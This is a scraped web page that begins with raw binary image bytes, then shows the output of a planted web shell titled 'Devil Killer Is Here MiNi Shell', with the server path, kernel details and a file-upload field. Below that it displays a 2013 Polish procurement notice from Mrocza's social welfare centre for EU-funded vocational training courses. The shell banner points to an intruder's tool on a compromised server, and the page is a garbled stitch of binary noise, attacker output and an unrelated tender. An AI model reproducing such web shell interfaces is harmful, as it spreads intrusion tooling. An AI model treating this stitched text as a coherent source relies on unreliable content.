JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130617/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130617/113961-N-2013.html

<p class="kh_header"><b>Mrocza: przeprowadzenie kursów zawodowych dla uczestników projektu systemowego Człowiek najlepsza inwestycja - jako rozwój zasobów ludzkich w drodze kształcenia, szkolenia i pracy realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1. Poddziałanie 7.1.1.  współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 113961 - 2013; data zamieszczenia: 17.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Łąkowa 7, 89-115 Mrocza, woj. kujawsko-pomorskie, tel. 52 385 63 55, faks 52 385 86 47.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mrocza.pl - zakładka - Jed. Org.: MGOPS - zakładka -przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przeprowadzenie kursów zawodowych dla uczestników projektu systemowego Człowiek najlepsza inwestycja - jako rozwój zasobów ludzkich w drodze kształcenia, szkolenia i pracy realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1. Poddziałanie 7.1.1.  współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia 
Zamówieniem jest przeprowadzenie kursów zawodowych dla osób bezrobotnych wraz z zajęciami praktycznymi uczestników projektu systemowego Człowiek najlepsza inwestycja - jako rozwój zasobów ludzkich w drodze kształcenia, szkolenia i pracy realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1. Poddziałanie 7.1.1.  współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
Zakres obejmuje następujące szkolenia:
 realizacja dla 16 uczestników projektu - beneficjentów  od dnia podpisania umowy do 30.11.2013r., następujących kursów zawodowych:

Pakiet I -Kurs prawa jazdy kat. B
Pakiet II- Kurs spawania metodą MAG i TIG
Pakiet III- Magazynier - sprzedawca z obsługą komputera, kas fiskalnych i wózków jezdniowych.
Pakiet IV-Opiekunka dziecięca, osób starszych i niepełnosprawnych

Ogólne warunki dotyczące opisu przedmiotu zamówienia:

1. Uczestnicy szkolenia
Szkolenie przeznaczone jest dla 16 osób bezrobotnych - uczestników projektu: 10 kobiet i 6 mężczyzn- w czterech pakietach:
Pakiet I -Kurs prawa jazdy kat. B - 7 osoby - 6 kobiet - 1 mężczyzna
Pakiet II- Kurs spawania metodą MAG i TIG - 2 osoby - 2 mężczyzn
Pakiet III- Magazynier - sprzedawca z obsługą komputera, kas fiskalnych i wózków jezdniowych..- 5 osoby - 2 kobieta i 3 mężczyzn
Pakiet IV-Opiekunka dziecięca, osób starszych i niepełnosprawnych -  osoby - 2 kobiety
   Jedna osoba będzie uczestniczyła w jednym Pakiecie-kursie. 

Zamawiający zastrzega sobie prawo dokonania zmiany liczby osób skierowanych na kursy zawodowe do czasu rozpoczęcia kursu oraz w czasie jego trwania, jeżeli będzie możliwa i celowa realizacja programu kursu.
	
2. Miejsce realizacji szkolenia
1) Zajęcia powinny odbywać się na terenie powiatu nakielskiego. Wykonawca zobowiązany  jest w Formularzu oferty - załącznik nr 1 do SIWZ wskazać dokładny adres miejsca odbywania szkolenia, podroż w jedną stronę nie może być dłuższa niż 1 godzina mierząc od miasta Mrocza. Wykonawca pokrywa koszty dojazdu  z Mroczy na kursy zawodowe do miejsca przeznaczenia i z powrotem.
2) Zamawiający dopuszcza możliwość przeprowadzenia szkolenia poza wskazanym  terenem powiatu, jednak podroż  w jedną stronę nie może być dłuższa niż 1 godzina mierząc od miasta Mrocza. Wykonawca pokrywa koszty dojazdu z Mroczy na kursy zawodowe do miejsca przeznaczenia i z powrotem.
3)W przypadku odbywania zajęć praktycznych w innym miejscu niż zajęcia teoretyczne Wykonawca zobowiązany jest dowozić uczestników szkolenia z jednego wyznaczonego punktu do miejsca odbywania praktyki. Koszt dowozu należy ująć  w koszcie całkowitym szkolenia.
4) Wykonawca zobowiązany jest do zapewnienia uczestnikom szkolenia  odpowiednich warunków lokalowych w miejscu szkolenia, zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy. 
5) Sala do zajęć teoretycznych w warunkach codziennego użytkowania powinna mieć przeznaczenie wykładowe lub konferencyjne, powinna być wyposażona w tablicę, sprzęt audiowizualny, ułatwiający przekazywanie wiadomości uczestnikom szkolenia. Sala musi być wyposażona  w odpowiednią do liczby uczestników liczbę stolików i miejsc siedzących, właściwie oświetlona, ogrzewana, przewietrzana. Wykonawca musi zapewnić uczestnikom szkolenia swobodny dostęp do pomieszczeń sanitarnych w budynku, w którym odbywa się szkolenie (tj. WC, umywalka wraz z dostępem do ciepłej wody). 
6) Pomieszczenia, w których odbywać się będą zajęcia z uczestnikami muszą być oznaczone logotypami POKL i UE oraz informacjami o realizowanym projekcie.
7) Zamawiający zastrzega sobie prawo weryfikacji informacji podanych w ofercie poprzez wizję lokalną pomieszczeń przeznaczonych do kursów zawodowych (i zajęć praktycznych) przed zawarciem umowy.

3.Czas trwania i sposób organizacji szkolenia.
1) Wymagana liczba godzin szkolenia  dla Pakietu Nr I min. 60 h; dla Pakietu Nr II min.230 h; dla Pakietu Nr III min. 100h; dla Pakietu Nr IV min 150h; dla każdego uczestnika. Przez jedną godzinę należy rozumieć: 60 minut - 45 minut zajęć edukacyjnych oraz 15 minut przerwy, przy czym długość przerwy może być ustalona w sposób elastyczny. Zajęcia nie mogą kończyć się przerwą. Szkolenie musi być realizowane według planu nauczania obejmującego nie mniej niż 25 godzin zegarowych w tygodniu
2) Realizacja szkolenia odbywać się będzie w ciągu 5 dni w tygodniu od poniedziałku do piątku. Zajęcia powinny odbywać się w godzinach od 8:00 maks. do 20:00. Liczba godzin zajęć każdego dnia musi być pełna, nie może być większa niż 8 godzin dziennie.
3) Wykonawca zobowiązany jest do ubezpieczenia wszystkich uczestników szkolenia od następstw nieszczęśliwych wypadków. Okres ubezpieczenia obejmie cały okres trwania szkolenia. Koszty ubezpieczenia NNW należy ująć w cenie.
4) Wykonawca pokrywa koszty związane z przeprowadzeniem badań lekarskich wymaganych przepisami prawa.
5) Wykonawca powinien zapewnić każdego dnia szkolenia catering w postaci: kawy, herbaty lub napojów zimnych w ilości min. 0,5 l  oraz 1szt. ciasta-wyrobu cukierniczego typu pączek, drożdżówka; na 1 osobę .
6)Wykonawca gwarantuje również podanie każdemu uczestnikowi ciepłego posiłku (w dni, w których zajęcia będą trwały 5h i więcej).
7) Wykonawca zapewnia, że posiada odpowiednią kadrę, sprzęt, pomoce  dydaktyczne oraz pomieszczenia do odbywania szkoleń będących przedmiotem zamówienia.
8) Szczegółowy harmonogram zajęć określi Wykonawca i przedłoży go Zamawiającemu najpóźniej w terminie 2 dni przed rozpoczęciem kursu.
9) Wykonawca ponosi pełną odpowiedzialność za wykonanie przedmiotu zamówienia zorganizowania i przeprowadzenia kursów zawodowych, zgodnie z wymogami prawa określonymi w odrębnych przepisach i w zakresie zgodności z tymi przepisami.
10) Wszelkie uwagi Zamawiającego związane, z jakością i ilością prowadzonych zajęć (w tym zajęć praktycznych) Wykonawca uwzględni, najpóźniej w następnym dniu wyznaczonym na odbycie danego szkolenia.
11) Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych niezbędnych przy realizacji danego kursu.
12) W ramach zajęć praktycznych Wykonawca zapewni wszelkie materiały do wykonania zajęć praktycznych i dostarczy je na swój koszt na miejsce praktyk.

4. Materiały dydaktyczne i narzędzia dla uczestników szkolenia.
1) Wszyscy uczestnicy szkolenia muszą otrzymać na pierwszych zajęciach bezzwrotnie materiały edukacyjne z logo EFS przygotowane przez Wykonawcę. 
2) Odbiór powyższych materiałów dydaktycznych potwierdzony zostanie przez każdego uczestnika podpisaniem stosownego oświadczenia. 
3)W ramach realizowanego kursu Wykonawca zapewni każdemu uczestnikowi szkolenia w odpowiednim dla niego rozmiarze i przekaże na własność indywidualne środki ochrony indywidualnej .

5. Program szkolenia.
Program szkolenia zgodnie z § 75 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 12 grudnia 2011 r. w sprawie standardów i warunków prowadzenia usług rynku pracy  ( Dz. U. Nr 279 poz. 1641) zawiera: 
a) nazwę  i  zakres szkolenia,
b) czas trwania i sposób organizacji szkolenia,
c) wymagania wstępne dla uczestników szkolenia,
d) cel szkolenia,
e)plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar  z uwzględnieniem w miarę potrzeb, części teoretycznej i praktyczniej, 
f) opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych, 
g) wykaz literatury, oraz niezbędnych środków dydaktycznych ,
h) przewidziane sprawdziany i egzaminy.
Każdy uczestnik musi otrzymać zaświadczenie o ukończeniu szkolenia zgodne ze wzorem zawartym  w rozporządzeniu MEN z dnia 11.02.2012 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych  (Dz. U. z dnia 17 lutego 2012 poz. 186) zawierające:  
a) numer z rejestru,
b) imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzający tożsamości,
c) nazwę instytucji szkoleniowej przeprowadzającej szkolenie,
d) formę i nazwę szkolenia,      
e) okres trwania szkolenia,
f) miejsce i datę wydania zaświadczenia lub innego dokumentu   potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, 
g) tematy i wymiary godzin zajęć edukacyjnych,
h) podpis osoby upoważnionej przez instytucje szkoleniowa przeprowadzającą szkolenie.  

6.Zakres merytoryczny szkolenia.
Szkolenie należy przeprowadzić zgodnie z programem szkolenia - kursu, który należy dołączyć do oferty według załącznika nr 7 do SIWZ. Osoba, która w trakcie odbywania szkolenia przebywać będzie 80% czasu na zwolnieniu lekarskim nie może uzyskać zaświadczenia
 o ukończeniu szkolenia.
7.Pozostałe wymagania.

1) Wykonawca zobowiązany jest do prowadzenia dokumentacji przebiegu szkolenia stanowiącej:
a)dziennik zajęć wypełniany codziennie zgodnie z obowiązującym programem nauczania zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
b)protokół z egzaminu,
c) rejestr wydanych zaświadczeń potwierdzających ukończenie szkolenia,
d) lista odbioru posiłków,
e) listy odbioru materiałów szkoleniowych zapewnionych w ramach kursu,
f) lista odbioru środków finansowych na pokrycie kosztów dojazdów na szkolenie,
g) listy ubezpieczonych klientów,
h) listy odbioru środków ochronnych  zapewnionych w ramach danego kursu. 

2) Wykonawca zobowiązany jest do należytego zabezpieczenia i przechowywania wszelkich dokumentów związanych z realizacją umowy przez okres co najmniej 10 lat od momentu zakończenia realizacji szkolenia i udostępnienia ich instytucjom krajowym i Unii Europejskiej upoważnionym do kontroli.
3)Wykonawca winien działać zgodnie z ustawą o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101 poz.926 z późń zm.),
4) Cała dokumentacja prowadzona przez Wykonawcę winna być opatrzona właściwymi logotypami POKL i UE.

8. Dokładany opis poszczególnych pakietów został określony w załączniku do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 66.51.21.00-3, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> _____________________</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art.24 ust.1 ustawy pzp oraz spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy pzp, dotyczące:
Posiadania uprawnienia do wykonywania określonej działalności lub czynności,
jeżeli przepisy prawa nakładają obowiązek ich posiadania:
-Wykonawca posiada wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, zgodnie z art. 20 ustawy o promocji zatrudnienia i instytucjach rynku pracy z dnia 20 kwietnia 2004 r. 
Ocena spełniania warunku będzie dokonana na podstawie złożonego zaświadczenia o podleganiu wpisowi do rejestru instytucji szkoleniowej wystawionej przez WUP właściwy ze względu na siedzibę instytucji szkoleniowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy posiadający wiedzę i doświadczenie  z zakresu objętym zamówieniem. Wykonawca jest zobowiązany do przedłożenia wykazu wykonanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Zamawiający określa, że Wykonawca w celu spełnienia warunki i w celu zweryfikowania przez Zamawiającego warunku posiadania przez Wykonawcę doświadczenia,Wykonawca musi w wykazie wykonanych usług wskazać, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie Wykonawca wykonał co najmniej 1 zamówienie w przedmiocie przeprowadzenia kursu o tematyce odpowiadającym zakresowi tematycznemu Pakietu  I-IV na który Wykonawca składa ofertę.
Dowodem potwierdzającym może być:
1) poświadczenie,
2)oświadczenie Wykonawcy- jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o których mowa wyżej.

W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa wyżej, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przekładania dowodów, o których mowa wyżej.

Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu wykonanych usług i dokumentów potwierdzających, że usługi zostały wykonane lub są wykonywane należycie; na zasadzie spełnia/ nie spełnia.

Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji Wykonawca zobowiązany będzie udowodnić Zamawiającemu, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji prawa korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia tj. wykładowcami posiadającymi odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie. Wykonawca musi posiadać kwalifikacje zawodowe odpowiednie do przeprowadzenia kształcenia zgodnie z wymogami rozporządzenia Ministra Edukacji i Nauki z dnia 11.02.2012 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z dnia 17 lutego 2012 poz. 186).
Personel projektu- tj. osoby zaangażowane w realizacji zadań w ramach projektu, które osobiście wykonują zadania w ramach projektu tj. w szczególności osoby zatrudnione na podstawie stosunku pracy lub stosunku cywilnoprawnego, osoby samozatrudnione, osoby współpracujące w rozumieniu ustawy z dnia 13.10.1998r. o systemie ubezpieczeń społecznych (Dz. U. z 2009 r. Nr 205, poz. 1585 ze zm.) musi spełnić warunki określone w aktualnych Wytycznych w zakresie kwalifikowania wydatków w ramach POKL z dnia 14.08.2012 r. Ministra Rozwoju Regionalnego.
Personel projektu - w przypadku osoby wykonującej zadania w więcej niż jednym projekcie są kwalifikowane, jeżeli:
1) obciążenie z tego wynikające nie wyklucza możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych danej osobie,
2) łączne zaangażowanie w realizację zadań we wszystkich projektach nie przekracza 240 godzin miesięcznie oraz osoba ta:
a. Prowadzi ewidencję godzin i zadań realizowanych w ramach wszystkich projektów, z wyłączeniem przypadku, gdy osoba ta wykonuje prace w ramach kilku projektów w ramach jednego stosunku pracy.
b. Przekazuje Beneficjentowi ewidencję, o której mowa w lit. a w odniesieniu do okresu wykonywania zadań w ramach projektu Beneficjenta.
Ocena spełnienia warunku zostanie dokonania na podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia oraz oświadczenia, że osoby te posiadają wymagane uprawnienia i kwalifikacje, na zasadzie spełnia/ nie spełnia.

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów od oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>_____________________</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)
1) formularz oferty (wg załączonego druku),
2) część merytoryczną (sposób realizacji zamówienia) składającą się w szczególności z programów kursów zawierających w odniesieniu do każdego z kursów (Pakietów) wchodzących w zakres przedmiotu zamówienia, co najmniej :cele kursu, szczegółowy opis kursu, zakres merytoryczny, liczbę godzin przewidywanych na poszczególne zagadnienia,
3) wskazane w SIWZ dokumenty na potwierdzenie spełnienia warunków udziału w postępowaniu oraz braku podstaw do wykluczenia.
